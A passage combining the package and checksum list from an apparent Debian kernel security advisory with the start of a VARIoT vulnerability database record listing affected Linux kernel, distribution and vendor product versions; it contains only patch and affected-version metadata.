3c58a3f4a1d9b89c0c189eb2407783c7 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390_2.6.26-21lenny3_s390.deb Size/MD5 checksum: 231486 4f229cd14a2c27f0d2784acfc5929f92 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_s390.deb Size/MD5 checksum: 108702 1c33ae2d8ad15eed26d365f8815fcf06 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-s390x_2.6.26-21lenny3_s390.deb Size/MD5 checksum: 7842050 5dcd3840524dad2b8dca28091e265c77 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-s390_2.6.26-21lenny1_s390.deb Size/MD5 checksum: 108442 05e65d77de538f379150ff888d4da788

sparc architecture (Sun SPARC/UltraSPARC)

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64-smp_2.6.26-21lenny3_sparc.deb Size/MD5 checksum: 304836 60db894e762c4c762d878fa4a538cee6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-sparc_2.6.26-21lenny1_sparc.deb Size/MD5 checksum: 108454 122fa3253107c5867f1d7171b6802630 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64_2.6.26-21lenny3_sparc.deb Size/MD5 checksum: 14249708 fd2527370a79250e8f374d05c5e48cfe http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-sparc64_2.6.26-21lenny1_sparc.deb Size/MD5 checksum: 300434 4681dd7de1437b3ac2c8420c0c793496 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-sparc64_2.6.26-21lenny2_sparc.deb Size/MD5 checksum: 305056 09a2296bbad709fadaa0a7acf597f123 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64-smp_2.6.26-21lenny2_sparc.deb Size/MD5 checksum: 14573800 f8d7e11eb1667f2ead6bb8aa92dce7c4 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64_2.6.26-21lenny3_sparc.deb Size/MD5 checksum: 303008 ca229d3e1d36665400bd0005858473e0 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_sparc.deb Size/MD5 checksum: 784800 44122e452c72b7d854c6d29ce98e3d48 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_sparc.deb Size/MD5 checksum: 799228 7f5dfb496b80755569d320bbf0ee4888 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_sparc.deb Size/MD5 checksum: 3822248 3048df9d0a20c7866253f79afa934735 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64-smp_2.6.26-21lenny2_sparc.deb Size/MD5 checksum: 305374 05ade563f319712d4b8de7407a25e106 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64_2.6.26-21lenny1_sparc.deb Size/MD5 checksum: 14199372 14dd0886b189b1ffa86855caf9568d71 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64_2.6.26-21lenny2_sparc.deb Size/MD5 checksum: 14250896 29dc2c98bb0f9bc154b59486892686bd http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-sparc_2.6.26-21lenny2_sparc.deb Size/MD5 checksum: 108576 1ba3270b78802cd3fe15c8cc3746b482 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64_2.6.26-21lenny2_sparc.deb Size/MD5 checksum: 302700 8d5d0c42583d5fa2bf0af6a4774b6be9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-sparc64_2.6.26-21lenny3_sparc.deb Size/MD5 checksum: 14592944 7098b971ee9d70eb92335ccfc9e071e9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64_2.6.26-21lenny1_sparc.deb Size/MD5 checksum: 297880 b8c7da78c57207af9f51fefef74810d3 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_sparc.deb Size/MD5 checksum: 3718614 62431ffe89341ef70445cc9b18b680aa http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-sparc64_2.6.26-21lenny3_sparc.deb Size/MD5 checksum: 305236 1ecbd687d76f725e8ba018eaa3fac6c5 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64-smp_2.6.26-21lenny3_sparc.deb Size/MD5 checksum: 14572560 614993b7b9f13159922158175d673ab9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny2_sparc.deb Size/MD5 checksum: 3822498 20e7f68725ddf51332e0554a96f7bd6c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-sparc64_2.6.26-21lenny1_sparc.deb Size/MD5 checksum: 14539066 ff1e7b5d4c1d279254925efe261cbca7 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_sparc.deb Size/MD5 checksum: 108710 56304708930d0cd9c64a055b03511d4c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_sparc.deb Size/MD5 checksum: 799118 7a64b7389f1bf41511ce0c93665d8792 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_sparc.deb Size/MD5 checksum: 108430 a67227f066768bde2bb78cd578986f88 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64-smp_2.6.26-21lenny1_sparc.deb Size/MD5 checksum: 14520660 dce34d857d90cbdab0dd73efa18b6859 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-sparc_2.6.26-21lenny3_sparc.deb Size/MD5 checksum: 108726 8295960b735e2799a889d5fd593b128a http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_sparc.deb Size/MD5 checksum: 3788028 34c07fccd4d1e9dbc1cfdd0918fb6bae http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny1_sparc.deb Size/MD5 checksum: 3751162 980707bc74c46c3859b6a1f0a10c1e5c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_sparc.deb Size/MD5 checksum: 108556 9cf91819aceb42e810eed1da7ff5e384 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-sparc64_2.6.26-21lenny2_sparc.deb Size/MD5 checksum: 14593082 1bcc020b8d5d0d58788293017b1c67ec http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64-smp_2.6.26-21lenny1_sparc.deb Size/MD5 checksum: 299360 aa33980c597218177f9023b8b3dcb3f2 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_sparc.deb Size/MD5 checksum: 3788198 22648123f5cde436d78c937cabe9655e

These files will probably be moved into the stable distribution on its next update

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201002-0694",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.8,
        "vendor": "linux",
        "version": "2.6.32.8"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "6.06"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "8.10"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "9.04"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "9.10"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "8.04"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "linux",
        "version": "2.6.24.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "linux",
        "version": "2.6.25.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "linux",
        "version": "2.6.25.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "linux",
        "version": "2.6.25.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "linux",
        "version": "2.6.21.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "linux",
        "version": "2.6.21.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "linux",
        "version": "2.6.23.10"
      },
      {
        "model": "esx",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "vmware",
        "version": "3.0.3"
      },
      {
        "model": "esx",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "vmware",
        "version": "3.5"
      },
      {
        "model": "esx",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "vmware",
        "version": "3.x"
      },
      {
        "model": "esx",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "esx",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "vmware",
        "version": "4.1"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3 (x86)"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3 (x86-64)"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "4.0"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "4.0 (x86-64)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4 (es)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4 (ws)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4.8 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4.8 (es)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5 (server)"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4.0"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5.0 (client)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6.22_rc1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6.24_rc1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6.25.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "linux hppa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel -test6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.4"
      },
      {
        "model": "linux enterprise server unsupported extras",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "proactive contact",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1.1"
      },
      {
        "model": "kernel 2.6.18-8.1.8.el5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.1"
      },
      {
        "model": "kernel 2.6.21-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "voice portal sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1"
      },
      {
        "model": "enterprise linux es",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.1"
      },
      {
        "model": "messaging storage server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.8"
      },
      {
        "model": "meeting exchange sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "kernel -test3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.5"
      },
      {
        "model": "voice portal sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.1"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.6"
      },
      {
        "model": "kernel 2.6.31-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.2.2"
      },
      {
        "model": "linux lts amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29.1"
      },
      {
        "model": "kernel -rc6-git6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "aura communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.4"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.4"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.267"
      },
      {
        "model": "message networking",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.1"
      },
      {
        "model": "meeting exchange sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.7"
      },
      {
        "model": "meeting exchange",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0.0.52"
      },
      {
        "model": "kernel -test9-cvs",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.214"
      },
      {
        "model": "voice portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "kernel 2.6.32-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "aura sip enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "kernel 2.6.22-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel 2.6.31-rc9",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "linux enterprise desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.16"
      },
      {
        "model": "linux lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "messaging storage server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel 2.6.24-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.09"
      },
      {
        "model": "kernel -test2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel 2.6.29-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "linux mandrake x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "2010.0"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.3"
      },
      {
        "model": "kernel -git7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "meeting exchange sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "linux armel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel 2.6.31-git11",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.12"
      },
      {
        "model": "kernel 2.6.29-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.13"
      },
      {
        "model": "kernel 2.6.31-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.31-rc5-git3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "voice portal sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.12"
      },
      {
        "model": "voice portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "aura sip enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "esx server esx410-201101201",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "voice portal sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.11"
      },
      {
        "model": "intuity audix lx sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "kernel -git1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.18"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.11"
      },
      {
        "model": "enterprise linux desktop client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.5"
      },
      {
        "model": "kernel 2.6.32-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.1"
      },
      {
        "model": "kernel -git14",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.273"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "linux lts i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
